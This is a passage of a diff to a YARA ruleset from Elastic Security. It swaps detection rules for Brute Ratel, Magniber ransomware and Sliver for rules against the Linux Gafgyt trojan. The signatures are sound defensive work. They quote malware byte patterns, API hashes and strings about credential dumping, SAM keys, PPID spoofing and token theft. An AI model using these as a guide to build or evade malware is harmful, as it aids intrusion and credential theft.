8B 42 50 89 7D F0 F2 0F 11 8D 18 FF } + $a = { C6 45 DB FC EB 04 C6 45 DB FE 0F B6 45 DB 88 45 FF 48 8D 75 FF 8B } condition: all of them } -rule ELASTIC_Windows_Trojan_Bruteratel_1916686D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_20F5E74F : FILE MEMORY { meta: - description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "1916686d-4821-4e5a-8290-58336d01997f" - date = "2022-06-23" - modified = "2022-12-01" + id = "20f5e74f-9f94-431b-877c-9b0d78a1d4eb" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BruteRatel.yar#L1-L31" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "e0e7b8ba2865fc76845b21aa3e075ceab98888635a60bd722c0c81e0f4fcf58c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L812-L830" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9084b00f9bb71524987dc000fb2bc6f38e722e2be2832589ca4bb1671e852f5b" + logic_hash = "067f1c15961c1ddceecb490b338db9f5b8501d89b38e870edfa628d21527dc1c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "86304082d3eda2f160465f0af0a3feae1aa9695727520e51f139d951e50d6efc" + fingerprint = "070fe0d678612b4ec8447a07ead0990a0abd908ce714388720e7fd7055bf1175" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "[+] Spoofed PPID => %lu" wide fullword - $a2 = "[-] Child process not set" wide fullword - $a3 = "[+] Crisis Monitor: Already Running" wide fullword - $a4 = "[+] Screenshot downloaded: %S" wide fullword - $a5 = "s[-] Duplicate listener: %S" wide fullword - $a6 = "%02d%02d%d_%02d%02d%2d%02d.png" wide fullword - $a7 = "[+] Added Socks Profile" wide fullword - $a8 = "[+] Dump Size: %d Mb" wide fullword - $a9 = "[+] Enumerating PID: %lu [%ls]" wide fullword - $a10 = "[+] Dump Size: %d Mb" wide fullword - $a11 = "[+] SAM key: " wide fullword - $a12 = "[+] Token removed: '%ls'" wide fullword - $a13 = "[Tasks] %02d => 0x%02X 0x%02X" wide fullword - $b1 = { 48 83 EC ?? 48 8D 35 ?? ?? ?? ?? 4C 63 E2 31 D2 48 8D 7C 24 ?? 48 89 CB 4D 89 E0 4C 89 E5 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A4 31 F6 BF ?? ?? ?? ?? 39 F5 7E ?? E8 ?? ?? ?? ?? 99 F7 FF 48 63 D2 8A 44 14 ?? 88 04 33 48 FF C6 EB ?? } + $a = { D8 8B 45 D0 8B 04 D0 8D 50 01 83 EC 0C 8D 85 38 FF FF FF 50 8D 85 40 FF } condition: - 4 of ($a*) or 1 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Bruteratel_9B267F96 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_1B2E2A3A : FILE MEMORY { meta: - description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "9b267f96-11b3-48e6-9d38-ecfd72cb7e3e" - date = "2022-06-23" - modified = "2022-07-18" + id = "1b2e2a3a-1302-41c7-be99-43edb5563294" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BruteRatel.yar#L33-L57" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "fbaaf4bf2462119b39a5df90b91fb831be3e602b926cd893374a5dddf48f029d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L832-L850" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "899c072730590003b98278bdda21c15ecaa2f49ad51e417ed59e88caf054a72d" + logic_hash = "6f40f868d20f0125721eb2a7934b356d69b695d4a558155a2ddcd0107d3f8c30" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f20cbaf39dc68460a2612298a5df9efdf5bdb152159d38f4696aedf35862bbb6" + fingerprint = "6f24b67d0a6a4fc4e1cfea5a5414b82af1332a3e6074eb2178aee6b27702b407" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "calAllocPH" ascii fullword - $a2 = "lizeCritPH" ascii fullword - $a3 = "BadgerPH" ascii fullword - $a4 = "VirtualPPH" ascii fullword - $a5 = "TerminatPH" ascii fullword - $a6 = "ickCountPH" ascii fullword - $a7 = "SeDebugPH" ascii fullword - $b1 = { 50 48 B8 E2 6A 15 64 56 22 0D 7E 50 48 B8 18 2C 05 7F BB 78 D7 27 50 48 B8 C9 EC BC 3D 84 54 9A 62 50 48 B8 A1 E1 3C 4E AF 2B F6 B1 50 48 B8 2E E6 7B A0 94 CA 9D F0 50 48 B8 61 52 80 AA 1A B6 4B 0E 50 48 B8 B2 13 11 5A 28 81 ED 60 50 48 B8 20 DE A9 34 89 08 C8 32 50 48 B8 9B DC C1 FF 79 CE 5B F5 50 48 B8 FD 57 3F 4C C7 D3 7A 21 50 48 B8 70 B8 63 0F AB 19 BF 1C 50 48 B8 48 F2 1B 72 1E 2A C6 8A 50 48 B8 E3 FA 38 E9 1D 76 E0 6F 50 48 B8 97 AD 75 } + $a = { 83 7D 18 00 74 25 8B 45 1C 83 E0 02 85 C0 74 1B C7 44 24 04 2D 00 } condition: - 3 of ($a*) or 1 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Bruteratel_684A39F2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_620087B9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "684a39f2-a110-4553-8d29-9f742e0ca3dc" - date = "2023-01-24" - modified = "2023-02-01" + id = "620087b9-c87d-4752-89e8-ca1c16486b28" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BruteRatel.yar#L59-L84" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5f4782a34368bb661f413f33e2d1fb9f237b7f9637f2c0c21dc752316b02350c" - logic_hash = "7cb74176e1dbdd248295649568d29c9d88841fcd0c16479b6b7efc71c4a1d706" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L852-L870" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961" + logic_hash = "411451ea326498a25af8be5cd43fe0b98973af354706268c89828b88ece5e497" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fef288db141810b01f248a476368946c478a395b1709a982e2f740dd011c6328" + fingerprint = "06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $seq1 = { 39 DA 0F 82 61 02 00 00 45 8D 48 14 44 39 CA 0F 82 54 02 00 00 41 8D 40 07 46 0F B6 0C 09 44 0F B6 1C 01 42 0F B6 04 11 41 C1 E3 08 41 09 C3 } - $seq2 = { 45 8A 44 13 F0 44 32 04 01 48 FF C0 45 88 04 13 48 FF C2 48 83 F8 04 75 E7 49 83 C2 04 48 83 C6 04 49 81 FA B0 00 00 00 75 AA 48 83 C4 38 5B 5E C3 } - $seq3 = { 48 83 EC 18 8A 01 88 04 24 8A 41 05 88 44 24 01 8A 41 0A 88 44 24 02 8A 41 0F 88 44 24 03 8A 41 04 88 44 24 04 8A 41 09 88 44 24 05 8A 41 0E 88 44 24 06 8A 41 03 88 44 24 07 } - $seq4 = { 42 8A 0C 22 8D 42 ?? 80 F9 ?? 75 ?? 48 98 4C 89 E9 48 29 C1 42 8A 14 20 80 FA ?? 74 ?? 88 14 01 48 FF C0 EB ?? } - $cfg1 = { 22 00 2C 00 22 00 61 00 72 00 63 00 68 00 22 00 3A 00 22 00 78 00 36 00 34 00 22 00 2C 00 22 00 62 00 6C 00 64 00 22 00 3A 00 22 00 } - $cfg2 = { 22 00 2C 00 22 00 77 00 76 00 65 00 72 00 22 00 3A 00 22 00 } - $cfg3 = { 22 00 2C 00 22 00 70 00 69 00 64 00 22 00 3A 00 22 00 } - $cfg4 = { 22 00 7D 00 2C 00 22 00 6D 00 74 00 64 00 74 00 22 00 3A 00 7B 00 22 00 68 00 5F 00 6E 00 61 00 6D 00 65 00 22 00 3A 00 22 00 } + $a = { 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B } condition: - any of ($seq*) and all of ($cfg*) + all of them } -rule ELASTIC_Windows_Trojan_Bruteratel_Ade6C9D5 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_Dd0D6173 : FILE MEMORY { meta: - description = "Targets API hashes used by BruteRatel" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "ade6c9d5-e9b5-4ef8-bacd-2f050c25f7f6" - date = "2023-01-24" - modified = "2023-02-01" + id = "dd0d6173-b863-45cf-9348-3375a4e624cf" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BruteRatel.yar#L86-L109" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dc9757c9aa3aff76d86f9f23a3d20a817e48ca3d7294307cc67477177af5c0d4" - logic_hash = "8ff8ed1e2b909606fe6aae3f43ad02898d7b3906c3d329a508f6d40490ec75a0" - score = 60 - quality = 45 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L872-L890" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6" + logic_hash = "7061edef1981e2b93bcdd8be47c0f6067acc140a543eed748bf0513f182e0a59" + score = 75 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "9a4c5660eeb9158652561cf120e91ea5887841ed71f69e7cf4bfe4cfb11fe74a" - threat_name = "Windows.Trojan.BruteRatel" + fingerprint = "5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $c1_NtReadVirtualMemory = { AA A5 EF 3A } - $c2_NtQuerySystemInformation = { D6 CA E1 E4 } - $c3_NtCreateFile = { 9D 8F 88 03 } - $c4_RtlSetCurrentTranscation = { 90 85 A3 99 } - $c5_LoadLibrary = { 8E 4E 0E EC } + $a = { 55 F8 8B 45 F0 89 42 0C 48 8B 55 F8 8B 45 F4 89 42 10 C9 C3 55 48 } condition: all of them } -rule ELASTIC_Windows_Trojan_Bruteratel_4110D879 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_779E142F : FILE MEMORY { meta: - description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "4110d879-8d36-4004-858d-e62400948920" - date = "2023-05-10" - modified = "2023-06-13" + id = "779e142f-b867-46e6-b1fb-9105976f42fd" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BruteRatel.yar#L111-L130" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e0fbbc548fdb9da83a72ddc1040463e37ab6b8b544bf0d2b206bfff352175afe" - logic_hash = "22c27523ddd8183c41da40f7ff908ae5bdee3b482c8a3f70aaa63a4c419e515b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L892-L910" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" + logic_hash = "80ba5a1cf333fafc6a1d7823ca4a8d5c30c1c07a01d6d681c22dd29e197089f1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "64d7a121961108d17e03fa767bd5bc194c8654dfa18b3b2f38cf6c95a711f794" + fingerprint = "83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 04 01 75 E2 48 83 C0 01 44 0F B6 04 02 45 84 C0 75 EC 48 89 } - $a2 = { C8 48 83 E9 20 44 0F B6 40 E0 41 80 F8 E9 74 0B 44 0F B6 49 03 41 80 } + $a = { EC 8B 45 E8 83 E0 02 85 C0 74 07 C7 45 D8 30 00 00 00 8B 45 E8 83 } condition: all of them } -rule ELASTIC_Windows_Trojan_Bruteratel_5B12Cbab : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_Cf84C9F2 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "5b12cbab-c64c-4895-a186-b940bf4a8620" - date = "2024-02-21" - modified = "2024-03-21" + id = "cf84c9f2-7435-4faf-8c5f-d14945ffad7a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BruteRatel.yar#L132-L150" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8165798fec8294523f25aedfc6699faad0c5d75f60bc7cefcbb2fa13dbc656e3" - logic_hash = "b86296dafaef1dfa0a41704cafa351694abb0e453e104dfe06836ed599338f38" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L912-L930" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" + logic_hash = "9af164ece7e7e0f33dc32f18735a8f655593ae6cde34e05108f3221b71aa8676" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "33e4c8fa032f33bec4719707d3ddcfa5103b747d9be70fa41848fdafd254c0ac" + fingerprint = "bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 48 81 EC 00 01 00 00 31 C0 41 89 D3 48 89 E3 88 04 18 48 FF C0 48 3D 00 01 00 00 75 F2 45 31 D2 31 FF 44 89 D0 42 8A 34 13 99 41 F7 FB 48 63 D2 8A 04 11 01 F0 01 F8 0F B6 F8 0F B6 C0 8A 14 04 } + $a = { 55 48 89 E5 48 83 EC 30 48 89 7D E8 89 75 E4 89 55 E0 C7 45 F8 01 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Bruteratel_5E383Ae0 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_0Cd591Cd : FILE MEMORY { meta: - description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "5e383ae0-c379-4a8b-938e-943fb1f3fd06" - date = "2024-03-27" - modified = "2024-05-08" + id = "0cd591cd-c348-4c3a-a895-2063cf892cda" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BruteRatel.yar#L152-L184" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0b506ef32f58ee2b1e5701ca8e13c67584739ab1d00ee4a0c2f532c09a15836f" - logic_hash = "5d87ada1c609e23742c389f8153a9266c4db95be4a5e10b50979aebc993a45e0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L932-L949" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "4300bdd173dfb33ca34c0f2fe4fa6ee071e99d5db201262e914721aad0ad433b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4a32b644ae97dfefa8766aa86cd519733ca2827a4a24d6ba5d9ac650a3559abc" + fingerprint = "96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "_imp_BadgerWcslen" - $a2 = "_imp_BadgerStrcmp" - $a3 = "_imp_BadgerDispatch" - $a4 = "_imp_BadgerStrlen" - $a5 = "_imp_BadgerMemset" - $a6 = "_imp_BadgerMemcpy" - $a7 = "_imp_BadgerWcscmp" - $a8 = "_imp_BadgerAlloc" - $a9 = "_imp_BadgerFree" - $a10 = "_imp_BadgerSetdebug" - $a11 = "_imp_BadgerGetBufferSize" - $b1 = "__imp_Kernel32$" - $b2 = "__imp_Ntdll$Nt" - $b3 = "__imp_Advapi32$" - $b4 = "__imp_NETAPI32$" + $a = { 4E F8 48 8D 4E D8 49 8D 42 E0 48 83 C7 03 EB 6B 4C 8B 46 F8 48 8D } condition: - 1 of ($a*) and 1 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Bruteratel_644Ac114 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_859042A0 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "644ac114-cc66-443e-9dd0-a591be99a86c" - date = "2024-04-17" - modified = "2024-05-08" + id = "859042a0-a424-4c83-944b-ed182b342998" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BruteRatel.yar#L186-L205" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ace6a99d95ef859d4ab74db6900753e754273a12a34721f1aa8f1a9df3d8ec35" - logic_hash = "06ffea16a0348f2276f379db150b5f9d2dbdffbcb2eee83c55c27c837ecb1e69" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L951-L969" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "41615d3f3f27f04669166fdee3996d77890016304ee87851a5f90804d6d4a0b0" + logic_hash = "b8daa4a136a6511472703687fe56fbca2bd005a1373802a46c8d211b6d039d75" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "471b2e5f0ae2a08accb90c602af5e892afc1f2a140b25db977df610123cf60be" + fingerprint = "a27bcaa16edceda3dc5a80803372c907a7efd00736c7859c5a9d6a2cf56a8eec" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 80 39 0F 75 ?? 80 79 01 05 75 ?? 80 79 02 C3 75 ?? 48 89 C8 C3 } - $b = { 80 79 01 8B 75 ?? 80 79 02 D1 75 ?? 41 80 F9 B8 75 ?? 80 79 06 00 75 ?? 0F B6 41 05 C1 E0 08 41 89 C0 0F B6 41 04 } + $a = { 45 A8 48 83 C0 01 48 89 45 C0 EB 05 48 83 45 C0 01 48 8B 45 C0 0F } condition: all of them } -rule ELASTIC_Windows_Ransomware_Magniber_Ea0140A1 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_33B4111A : FILE MEMORY { meta: - description = "Detects Windows Ransomware Magniber (Windows.Ransomware.Magniber)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "ea0140a1-b745-47f1-871f-5b703174a049" - date = "2021-08-03" - modified = "2021-10-04" + id = "33b4111a-e59e-48db-9d74-34ca44fcd9f5" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Magniber.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a2448b93d7c50801056052fb429d04bcf94a478a0a012191d60e595fed63eec4" - logic_hash = "e2c05e2c92444d7bcb2bf68e97f809072d2ccdc8a171214d2e7a498b20d08f90" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L971-L989" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961" + logic_hash = "a08c0f7be26e2e9abfaa392712895bb3ce1d12583da4060ebe41e1a9c1491b7c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b3c17024097af846f800a843da404dccb6d33eebb90a8524f2f2ec8a5c5df776" + fingerprint = "9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 58 C0 FF 24 4C 8B F0 48 89 45 18 E8 E2 F5 FF FF B9 A1 BD D1 CF 48 89 45 B8 E8 D4 F5 FF FF B9 52 C6 D7 0E 48 89 45 F8 E8 C6 F5 FF FF B9 43 AC 95 0E 48 89 45 B0 E8 B8 F5 FF FF B9 78 D4 33 27 4C 8B F8 48 89 45 D0 E8 A7 F5 FF FF B9 FE 36 04 DE 48 89 44 24 50 E8 98 F5 FF FF B9 51 23 2E F2 48 89 45 10 E8 8A F5 FF FF B9 DA F6 8A 50 48 89 45 08 E8 7C F5 FF FF B9 AD 9E 5F BB 48 89 45 20 E8 6E F5 FF FF B9 2D 57 AE 5B 48 89 45 A0 E8 60 F5 FF FF B9 C6 96 87 52 48 89 45 C8 E8 52 F5 FF FF B9 F6 76 0F 52 48 89 45 A8 E8 44 F5 FF FF B9 A3 FC 62 AA 48 8B F0 48 89 45 98 E8 33 F5 } + $a = { C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48 } condition: - any of them + all of them } -rule ELASTIC_Windows_Ransomware_Magniber_97D7575B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_4F43B164 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Magniber (Windows.Ransomware.Magniber)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "97d7575b-8fc7-4c6b-8371-b62842d90613" - date = "2021-08-03" - modified = "2021-10-04" + id = "4f43b164-686d-4b73-b532-45e2df992b33" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Magniber.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a2448b93d7c50801056052fb429d04bcf94a478a0a012191d60e595fed63eec4" - logic_hash = "9c85f98aaae28e9e90a94d6ce18389467013ea6b569f46f6acaf26a6c7e027fc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L991-L1009" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f0fdb3de75f85e199766bbb39722865cac578cde754afa2d2f065ef028eec788" + logic_hash = "79a17e70e9b7af6e53f62211c33355a4c46a82e7c4e80c20ffe9684e24155808" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "78253be69d9715892ec725918c3c856040323b83aeab8b84c4aac47355876207" + fingerprint = "35a885850a06e7991c3a8612bbcdfc279b87e4ca549723192d3011a1e0a81640" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 00 4C 00 4C 00 20 00 59 00 4F 00 55 00 52 00 20 00 44 00 4F 00 43 00 55 00 4D 00 45 00 4E 00 54 00 53 00 20 00 50 00 48 00 4F 00 54 00 4F 00 53 00 20 00 44 00 41 00 54 00 41 00 42 00 41 00 53 00 45 00 53 00 20 00 41 00 4E 00 44 00 20 00 4F 00 54 00 48 00 45 00 52 00 20 00 49 00 4D 00 50 00 4F 00 52 00 54 00 41 00 4E 00 54 00 20 00 46 00 49 00 4C 00 45 00 53 00 20 00 48 00 41 00 56 00 45 00 20 00 42 00 45 00 45 00 4E 00 20 00 45 00 4E 00 43 00 52 00 59 00 50 00 54 00 45 00 44 00 21 00 0D } + $a = { 46 00 4B 49 4C 4C 53 55 42 00 4B 49 4C 4C 53 55 42 20 3C 73 } condition: - any of them + all of them } -rule ELASTIC_Multi_Trojan_Sliver_42298C4A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_E4A1982B : FILE MEMORY { meta: - description = "Detects Multi Trojan Sliver (Multi.Trojan.Sliver)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "42298c4a-fcea-4c5a-b213-32db00e4eb5a" - date = "2021-10-20" - modified = "2022-01-14" + id = "e4a1982b-928a-4da5-b497-cedc1d26e845" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Multi_Trojan_Sliver.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007" - logic_hash = "a84bdb51fcdeb4629365bdb727b53087604ee0eb112c8d6c3ecf315598ec678a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1011-L1028" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "4cd7aa205b3571cffca208e315d6311fa92a5993e2a8e40d342d6184811f42f0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a" + fingerprint = 